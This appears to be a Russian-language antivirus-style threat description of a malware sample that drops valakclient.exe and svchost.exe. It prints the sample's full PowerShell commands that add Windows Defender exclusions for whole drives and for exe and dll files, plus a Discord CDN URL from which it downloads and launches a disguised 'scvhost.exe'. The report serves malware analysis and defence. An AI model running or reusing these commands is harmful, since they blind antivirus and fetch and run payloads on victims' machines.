Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Загружает
- https://cdn.discordapp.com/attachments/877290324622475286/884788168581328917/bnd.exe как (join-path -path $env:appdata -childpath scvhost.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\valakclient.exe
- %TEMP%\svchost.exe
- C:\valak_offsets.txt
Сетевая активность
Подключается к
- 'cd#.##scordapp.com':443
TCP
Другие
- 'cd#.##scordapp.com':443
UDP
- DNS ASK cd#.##scordapp.com
Другое
Создает и запускает на исполнение
- '%TEMP%\valakclient.exe'
- '%TEMP%\svchost.exe'
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'scvhost.exe')
